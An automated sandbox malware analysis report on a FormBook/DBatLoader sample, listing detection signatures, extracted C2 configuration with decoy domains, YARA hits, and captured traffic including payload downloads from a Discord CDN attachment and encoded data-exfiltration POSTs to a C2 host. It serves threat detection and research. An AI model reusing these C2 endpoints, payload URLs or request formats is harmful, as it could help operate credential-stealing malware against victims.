Windows Analysis Report WZ454554.exe

Overview

General Information

Sample Name:	WZ454554.exe
Analysis ID:	552851
MD5:	58b39c2620cdda3d3fa6a125f476fc9f
SHA1:	5d2672c79e9dffb2cdeee0d00e406c03c762985c
SHA256:	fdf39d043cc55d6a72b1fe01c9067bb7591d5c379798499148521e6158afeea0
Tags:	exeformbook
Infos:
Most interesting Screenshot:

Detection

FormBook DBatLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Detected FormBook malware

Multi AV Scanner detection for submitted file

Yara detected FormBook

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Malicious sample detected (through community Yara rule)

Yara detected DBatLoader

System process connects to network (likely due to code injection or exploit)

Multi AV Scanner detection for dropped file

Sample uses process hollowing technique

Tries to steal Mail credentials (via file / registry access)

Maps a DLL or memory area into another process

Modifies the prolog of user mode functions (user mode inline hooks)

Injects a PE file into a foreign processes

Queues an APC in another process (thread injection)

Tries to detect virtualization through RDTSC time measurements

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

HTTP GET or POST without a user agent

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Signatures

AV Detection:

Found malware configuration

Source: 00000014.00000002.559491799.00000000030A0000.00000004.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.spiegelpherese.com/m9g2/"], "decoy": ["pubgnewstatedl.com", "guidedwaveradar.com", "onlineexitpoll.com", "mutationdesign.com", "p60p.com", "xhcaijing.com", "skpcart.store", "houseathomes.com", "thenorthdale.com", "kvkkkararozetleri.com", "formecondominium.com", "7808lll.com", "mitchfletcher.com", "thatsawrapfl.com", "glrinternationalfzco.com", "dbmxkgek.com", "feelingfancy.com", "nishieihuku.com", "newearthhg.com", "tenlog040.xyz", "savche.xyz", "solarofoundation.com", "sk8.network", "schooljoy.net", "ioannismitsialisgerman.online", "hooklinen.com", "gorgeousingems.com", "directusimmigration.com", "nexxt.info", "itecsecure.com", "chairsexpert.com", "yandex-check.online", "ivdripspace.com", "sentlogisticsja.com", "mdk-clothing.com", "quick2repair.net", "thisflippingfamily.com", "lu-dra.xyz", "degenape.art", "evodiocese2022scm.com", "churchofrocknroll.com", "visionaryblock.com", "jornalonlinealagoas.com", "rainbow-of-light.com", "oblical.com", "preserveliqueur.com", "morbidthings.com", "panoramaregency.com", "iphone13promax.review", "gongyingmi.com", "xqzs72.com", "sgmoda.com", "boogiereaper.com", "bitesofwellness.online", "backdad.com", "freeimperia.com", "senerants.tech", "029yu.xyz", "dhakhtar.net", "cnclighting.com", "iplmatchwinner.com", "thpt.space", "naris.net", "hamgirls.com"]}

Multi AV Scanner detection for submitted file

Source: WZ454554.exe	Virustotal: Detection: 22%			Perma Link
Source: WZ454554.exe	ReversingLabs: Detection: 39%

Yara detected FormBook

Source: Yara match	File source: 21.1.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.WZ454554.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.1.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.WZ454554.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.1.WZ454554.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.1.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.1.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.0.Hyrzbcwcas.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.Hyrzbcwcas.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.WZ454554.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.WZ454554.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.1.WZ454554.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.Hyrzbcwcas.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.0.Hyrzbcwcas.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000000.360550532.00000000100E2000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.559491799.00000000030A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.556874060.0000000002B10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.407793404.00000000005E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.418862410.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.428947591.00000000005A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.436930793.00000000008F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.419325156.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.324007988.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.399621636.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.436845866.00000000008C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000001.400349591.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000001.324511598.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.436315053.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.400048444.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.407725220.00000000005B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.429108861.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.437292259.0000000002AD0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.559355148.0000000003070000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000001.419503342.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.324380363.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.431106841.0000000003000000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.428671777.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Multi AV Scanner detection for dropped file

Source: C:\Users\user\Contacts\Hyrzbcwcas.exe

ReversingLabs: Detection: 39%

Antivirus or Machine Learning detection for unpacked file

Source: 9.2.WZ454554.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 17.1.Hyrzbcwcas.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 21.1.Hyrzbcwcas.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 21.2.Hyrzbcwcas.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 17.2.Hyrzbcwcas.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.1.WZ454554.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files

Source: WZ454554.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI

Source: unknown	HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:49751 version: TLS 1.2

Source:	Binary string: wntdll.pdbUGP source: WZ454554.exe, 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, WZ454554.exe, 00000009.00000002.409087872.0000000000BAF000.00000040.00000001.sdmp, Hyrzbcwcas.exe, 00000011.00000002.429687044.0000000000B5F000.00000040.00000001.sdmp, Hyrzbcwcas.exe, 00000011.00000002.429448664.0000000000A40000.00000040.00000001.sdmp, help.exe, 00000014.00000002.559731759.00000000031E0000.00000040.00000001.sdmp, help.exe, 00000014.00000002.560116485.00000000032FF000.00000040.00000001.sdmp, Hyrzbcwcas.exe, 00000015.00000002.437079630.0000000000980000.00000040.00000001.sdmp, Hyrzbcwcas.exe, 00000015.00000003.420862619.00000000007E0000.00000004.00000001.sdmp, Hyrzbcwcas.exe, 00000015.00000002.437691847.0000000000A9F000.00000040.00000001.sdmp, cmd.exe, 00000019.00000002.431480106.00000000037E0000.00000040.00000001.sdmp, cmd.exe, 00000019.00000002.433718675.00000000038FF000.00000040.00000001.sdmp, help.exe, 0000001C.00000002.437536905.00000000033C0000.00000040.00000001.sdmp, help.exe, 0000001C.00000002.437717560.00000000034DF000.00000040.00000001.sdmp
Source:	Binary string: cmd.pdbUGP source: Hyrzbcwcas.exe, 00000011.00000002.432784499.0000000000DD0000.00000040.00020000.sdmp, cmd.exe, 00000019.00000000.427671130.0000000000D80000.00000040.00020000.sdmp, cmd.exe, 00000019.00000002.430750073.0000000000D80000.00000040.00020000.sdmp
Source:	Binary string: wntdll.pdb source: WZ454554.exe, WZ454554.exe, 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, WZ454554.exe, 00000009.00000002.409087872.0000000000BAF000.00000040.00000001.sdmp, Hyrzbcwcas.exe, Hyrzbcwcas.exe, 00000011.00000002.429687044.0000000000B5F000.00000040.00000001.sdmp, Hyrzbcwcas.exe, 00000011.00000002.429448664.0000000000A40000.00000040.00000001.sdmp, help.exe, 00000014.00000002.559731759.00000000031E0000.00000040.00000001.sdmp, help.exe, 00000014.00000002.560116485.00000000032FF000.00000040.00000001.sdmp, Hyrzbcwcas.exe, 00000015.00000002.437079630.0000000000980000.00000040.00000001.sdmp, Hyrzbcwcas.exe, 00000015.00000003.420862619.00000000007E0000.00000004.00000001.sdmp, Hyrzbcwcas.exe, 00000015.00000002.437691847.0000000000A9F000.00000040.00000001.sdmp, cmd.exe, 00000019.00000002.431480106.00000000037E0000.00000040.00000001.sdmp, cmd.exe, 00000019.00000002.433718675.00000000038FF000.00000040.00000001.sdmp, help.exe, 0000001C.00000002.437536905.00000000033C0000.00000040.00000001.sdmp, help.exe, 0000001C.00000002.437717560.00000000034DF000.00000040.00000001.sdmp
Source:	Binary string: help.pdbGCTL source: WZ454554.exe, 00000009.00000002.408113212.0000000000659000.00000004.00000020.sdmp, WZ454554.exe, 00000009.00000002.413836751.0000000002A50000.00000040.00020000.sdmp, Hyrzbcwcas.exe, 00000015.00000002.437020676.0000000000950000.00000040.00020000.sdmp
Source:	Binary string: help.pdb source: WZ454554.exe, 00000009.00000002.408113212.0000000000659000.00000004.00000020.sdmp, WZ454554.exe, 00000009.00000002.413836751.0000000002A50000.00000040.00020000.sdmp, Hyrzbcwcas.exe, 00000015.00000002.437020676.0000000000950000.00000040.00020000.sdmp
Source:	Binary string: cmd.pdb source: Hyrzbcwcas.exe, 00000011.00000002.432784499.0000000000DD0000.00000040.00020000.sdmp, cmd.exe, 00000019.00000000.427671130.0000000000D80000.00000040.00020000.sdmp, cmd.exe, 00000019.00000002.430750073.0000000000D80000.00000040.00020000.sdmp

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 4x nop then pop esi	9_2_004172E0
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 4x nop then pop esi	9_2_004172F4
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 4x nop then pop ebx	9_2_00407B1A
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 4x nop then pop edi	9_2_00416CB1
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 4x nop then pop esi	17_2_004172E0
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 4x nop then pop esi	17_2_004172F4
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 4x nop then pop ebx	17_2_00407B1A
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 4x nop then pop edi	17_2_00416CB1

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49817 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49817 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49817 -> 34.102.136.180:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.sentlogisticsja.com
Source: C:\Windows\explorer.exe	Domain query: www.senerants.tech
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.spiegelpherese.com/m9g2/

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /m9g2/?xXV=6l9PRhy0D4S&GvW=sz5ErymDSipaI2rGHMiHzQDn8335WrDZWT7fmGUTYuWWeT2KiLBKARdoGEtcQCocu9tS HTTP/1.1Host: www.sentlogisticsja.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: POST /m9g2/ HTTP/1.1Host: www.sentlogisticsja.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.sentlogisticsja.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.sentlogisticsja.com/m9g2/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 47 76 57 3d 6b 52 31 2d 31 57 32 49 66 69 6b 71 56 31 57 2d 65 70 48 42 74 33 28 62 72 55 7a 4b 55 37 33 73 55 55 72 5a 7a 31 55 56 52 74 43 71 61 41 53 53 76 4c 49 55 4f 46 51 61 65 42 4e 34 4d 68 41 52 73 4f 41 4e 32 5a 52 39 72 4c 6a 76 46 4f 65 52 46 6a 6b 6a 32 5f 78 41 44 55 76 5f 67 61 55 64 54 64 53 59 47 77 28 45 41 42 54 74 71 33 73 61 48 7a 5a 54 36 72 5a 53 47 39 4f 6f 6e 51 71 68 52 73 7e 70 63 52 32 34 57 62 6b 79 70 30 32 75 31 4a 4b 49 48 32 47 75 49 6d 5a 42 45 49 42 74 61 79 54 46 49 6a 33 63 31 39 44 6a 6c 72 69 58 6e 45 52 30 61 62 48 7a 61 32 4a 42 79 74 59 6b 4b 6a 50 4c 66 5a 50 74 35 68 79 6a 51 47 32 62 32 64 61 66 6f 49 51 65 4a 4c 59 4e 28 71 59 6b 47 6a 77 35 49 54 4c 4d 51 6f 68 35 4d 77 72 4e 42 63 6b 72 6d 49 34 4c 4e 6c 7e 59 6e 59 6d 34 6c 7a 58 43 6e 37 38 4b 28 36 54 5a 49 30 76 32 5a 74 47 5a 70 67 72 2d 32 38 57 6a 77 61 77 68 50 35 6c 4e 45 6f 42 6b 36 50 4c 78 66 6c 62 49 37 4a 38 73 39 2d 63 6e 51 77 32 53 69 4f 64 59 46 77 28 45 4c 4e 48 75 57 51 45 34 62 69 4d 5a 46 77 54 7a 52 73 4f 52 73 75 76 4a 28 7a 78 46 4d 48 64 37 34 75 39 6c 6c 32 4f 66 71 44 59 78 4b 64 57 51 45 68 30 4a 6e 42 4a 63 69 70 4e 4f 78 37 4d 41 28 71 41 42 49 78 76 76 72 49 6b 4e 6c 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: GvW=kR1-1W2IfikqV1W-epHBt3(brUzKU73sUUrZz1UVRtCqaASSvLIUOFQaeBN4MhARsOAN2ZR9rLjvFOeRFjkj2_xADUv_gaUdTdSYGw(EABTtq3saHzZT6rZSG9OonQqhRs~pcR24Wbkyp02u1JKIH2GuImZBEIBtayTFIj3c19DjlriXnER0abHza2JBytYkKjPLfZPt5hyjQG2b2dafoIQeJLYN(qYkGjw5ITLMQoh5MwrNBckrmI4LNl~YnYm4lzXCn78K(6TZI0v2ZtGZpgr-28WjwawhP5lNEoBk6PLxflbI7J8s9-cnQw2SiOdYFw(ELNHuWQE4biMZFwTzRsORsuvJ(zxFMHd74u9ll2OfqDYxKdWQEh0JnBJcipNOx7MA(qABIxvvrIkNlQ).
Source: global traffic	HTTP traffic detected: POST /m9g2/ HTTP/1.1Host: www.sentlogisticsja.comConnection: closeContent-Length: 149769Cache-Control: no-cacheOrigin: http://www.sentlogisticsja.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.sentlogisticsja.com/m9g2/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 47 76 57 3d 6b 52 31 2d 31 57 43 36 50 43 78 73 52 48 79 37 66 35 58 5a 6e 58 4f 43 36 46 54 56 64 49 6e 53 4f 44 61 65 7a 30 6b 52 65 4f 4b 43 51 41 69 53 6e 70 52 64 44 46 51 5a 59 42 4e 5f 61 52 63 74 79 73 51 37 32 64 68 48 72 4c 62 73 50 76 75 51 46 7a 6c 72 32 66 39 38 46 55 37 76 67 63 55 34 53 34 43 2d 4e 51 37 45 5a 78 37 72 76 6b 6b 52 47 32 70 51 34 62 46 58 45 39 57 78 6e 6a 76 42 53 4a 7e 4c 62 51 61 2d 52 74 6b 44 6d 58 28 78 78 65 75 4d 4a 47 36 74 48 46 6c 53 4b 4c 6c 70 66 33 7a 37 55 78 66 66 72 39 72 6c 67 73 48 71 6a 32 39 6e 59 4c 33 42 61 33 4d 38 71 4c 78 36 59 51 37 54 51 49 44 58 32 30 57 6c 63 56 4f 54 79 66 43 69 71 4c 49 68 4c 4f 6b 53 37 36 46 6b 46 68 59 70 4d 33 6e 6e 57 5a 74 39 5a 53 44 44 41 76 49 6a 7e 34 6f 30 45 48 65 31 74 73 72 33 78 51 37 57 70 37 38 68 7a 61 54 56 51 32 33 4f 4f 36 65 43 6f 67 61 5a 71 2d 33 35 36 70 45 6c 4f 4e 5a 56 42 4c 52 6c 34 66 58 74 51 30 72 77 78 61 51 6c 37 63 41 44 55 77 32 50 6d 4e 31 54 46 77 7e 39 4c 50 75 35 58 68 67 34 62 7a 74 44 49 7a 4c 4a 41 38 4f 51 70 2d 28 4c 6d 77 5a 56 4d 48 46 37 35 62 59 74 33 56 65 66 74 56 63 79 4a 35 43 51 58 42 30 4a 71 68 4a 43 79 4a 67 34 7a 34 63 32 74 4b 67 5a 66 47 65 6f 71 70 42 37 6e 47 67 4e 54 35 44 53 5a 47 52 4f 74 61 4f 79 74 44 41 6d 53 50 71 64 68 65 75 44 4f 46 59 39 49 59 79 48 45 65 4b 2d 7e 73 7e 6a 59 33 4a 5f 48 64 62 68 6e 61 74 45 75 32 59 64 53 5a 47 79 6e 4e 35 55 76 4a 6a 48 4e 78 42 54 45 48 72 71 63 73 68 61 75 42 6d 6e 59 74 4a 73 45 4e 49 2d 64 45 6e 2d 69 6f 32 55 4f 47 4b 65 32 42 4b 52 44 32 37 35 33 78 44 53 71 7a 28 51 45 56 69 32 32 41 78 66 4b 4e 79 6b 4d 66 41 78 4d 41 77 78 7a 34 58 49 63 6d 42 53 39 69 32 4d 28 5a 65 66 35 2d 75 43 39 4c 63 4d 6c 6e 39 39 77 2d 31 4f 52 4c 47 65 56 6c 43 77 47 32 34 5a 66 6c 56 32 69 55 4e 34 6c 59 75 65 58 70 72 77 6b 47 49 56 42 6e 4f 52 47 34 50 51 62 49 41 74 4d 4f 48 74 5a 41 62 75 77 38 34 46 55 67 64 59 66 31 6d 32 48 38 65 5f 37 56 78 79 70 36 63 4b 41 44 65 4d 61 37 70 61 45 32 4e 75 68 75 30 77 77 4e 30 7a 4c 74 51 2d 42 6a 62 41 4b 70 73 45 4f 43 48 73 70 76 77 43 79 66 47 74 4a 39 75 61 57 56 30 77 51 4e 51 59 39 46 6a 61 43 43 51 4b 46 5a 72 6f 6f 31 41 4a 36 75 76 46 38 48 58 76 78 41 67 53 68 51 39 63 71 55 31 52 59 6f 73 38 68 63 7e 4f 51 6e 63 4f 76 44 4f 46 6f 6f 74 53 28 7a 5a 4d 64 42 78 30 57 2d 56 69 4c 78 37 51 69 58 63 58 46 63 48 56 63 44 72 41 42 66 50 76 4a 53 43 58 39 6a 47 32 53 56 4d 58 71 66 4c 61 63 47 44 6d 6a 4c 74 70 7a 65 32 63 59 52 71 6f 70 31 41 6a 68 66 63 79 69 5f 70 55 4c 4c 58 76 44 66 63 38 43 61 62 57 47 66 65

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 13 Jan 2022 19:23:52 GMTContent-Type: text/htmlContent-Length: 275ETag: "6192576d-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Source: WZ454554.exe, 00000002.00000003.285422442.0000000000878000.00000004.00000001.sdmp, WZ454554.exe, 00000002.00000003.285452298.0000000000878000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: help.exe, 00000014.00000002.560892253.0000000003929000.00000004.00020000.sdmp	String found in binary or memory: http://www.sentlogisticsja.com
Source: help.exe, 00000014.00000002.560892253.0000000003929000.00000004.00020000.sdmp	String found in binary or memory: http://www.sentlogisticsja.com/m9g2/

Source: unknown

HTTP traffic detected: POST /m9g2/ HTTP/1.1Host: www.sentlogisticsja.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.sentlogisticsja.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.sentlogisticsja.com/m9g2/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 47 76 57 3d 6b 52 31 2d 31 57 32 49 66 69 6b 71 56 31 57 2d 65 70 48 42 74 33 28 62 72 55 7a 4b 55 37 33 73 55 55 72 5a 7a 31 55 56 52 74 43 71 61 41 53 53 76 4c 49 55 4f 46 51 61 65 42 4e 34 4d 68 41 52 73 4f 41 4e 32 5a 52 39 72 4c 6a 76 46 4f 65 52 46 6a 6b 6a 32 5f 78 41 44 55 76 5f 67 61 55 64 54 64 53 59 47 77 28 45 41 42 54 74 71 33 73 61 48 7a 5a 54 36 72 5a 53 47 39 4f 6f 6e 51 71 68 52 73 7e 70 63 52 32 34 57 62 6b 79 70 30 32 75 31 4a 4b 49 48 32 47 75 49 6d 5a 42 45 49 42 74 61 79 54 46 49 6a 33 63 31 39 44 6a 6c 72 69 58 6e 45 52 30 61 62 48 7a 61 32 4a 42 79 74 59 6b 4b 6a 50 4c 66 5a 50 74 35 68 79 6a 51 47 32 62 32 64 61 66 6f 49 51 65 4a 4c 59 4e 28 71 59 6b 47 6a 77 35 49 54 4c 4d 51 6f 68 35 4d 77 72 4e 42 63 6b 72 6d 49 34 4c 4e 6c 7e 59 6e 59 6d 34 6c 7a 58 43 6e 37 38 4b 28 36 54 5a 49 30 76 32 5a 74 47 5a 70 67 72 2d 32 38 57 6a 77 61 77 68 50 35 6c 4e 45 6f 42 6b 36 50 4c 78 66 6c 62 49 37 4a 38 73 39 2d 63 6e 51 77 32 53 69 4f 64 59 46 77 28 45 4c 4e 48 75 57 51 45 34 62 69 4d 5a 46 77 54 7a 52 73 4f 52 73 75 76 4a 28 7a 78 46 4d 48 64 37 34 75 39 6c 6c 32 4f 66 71 44 59 78 4b 64 57 51 45 68 30 4a 6e 42 4a 63 69 70 4e 4f 78 37 4d 41 28 71 41 42 49 78 76 76 72 49 6b 4e 6c 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: GvW=kR1-1W2IfikqV1W-epHBt3(brUzKU73sUUrZz1UVRtCqaASSvLIUOFQaeBN4MhARsOAN2ZR9rLjvFOeRFjkj2_xADUv_gaUdTdSYGw(EABTtq3saHzZT6rZSG9OonQqhRs~pcR24Wbkyp02u1JKIH2GuImZBEIBtayTFIj3c19DjlriXnER0abHza2JBytYkKjPLfZPt5hyjQG2b2dafoIQeJLYN(qYkGjw5ITLMQoh5MwrNBckrmI4LNl~YnYm4lzXCn78K(6TZI0v2ZtGZpgr-28WjwawhP5lNEoBk6PLxflbI7J8s9-cnQw2SiOdYFw(ELNHuWQE4biMZFwTzRsORsuvJ(zxFMHd74u9ll2OfqDYxKdWQEh0JnBJcipNOx7MA(qABIxvvrIkNlQ).

Source: unknown

DNS traffic detected: queries for: cdn.discordapp.com

Source: global traffic	HTTP traffic detected: GET /attachments/801846679439016010/931166967853875200/Hyrzbcwcasllzbwmlqsydewtjitxnzf HTTP/1.1User-Agent: lValiHost: cdn.discordapp.com
Source: global traffic	HTTP traffic detected: GET /attachments/801846679439016010/931166967853875200/Hyrzbcwcasllzbwmlqsydewtjitxnzf HTTP/1.1User-Agent: 97Host: cdn.discordapp.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /attachments/801846679439016010/931166967853875200/Hyrzbcwcasllzbwmlqsydewtjitxnzf HTTP/1.1User-Agent: 11Host: cdn.discordapp.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /attachments/801846679439016010/931166967853875200/Hyrzbcwcasllzbwmlqsydewtjitxnzf HTTP/1.1User-Agent: 85Host: cdn.discordapp.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /m9g2/?xXV=6l9PRhy0D4S&GvW=sz5ErymDSipaI2rGHMiHzQDn8335WrDZWT7fmGUTYuWWeT2KiLBKARdoGEtcQCocu9tS HTTP/1.1Host: www.sentlogisticsja.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown	HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49750 version: TLS 1.2
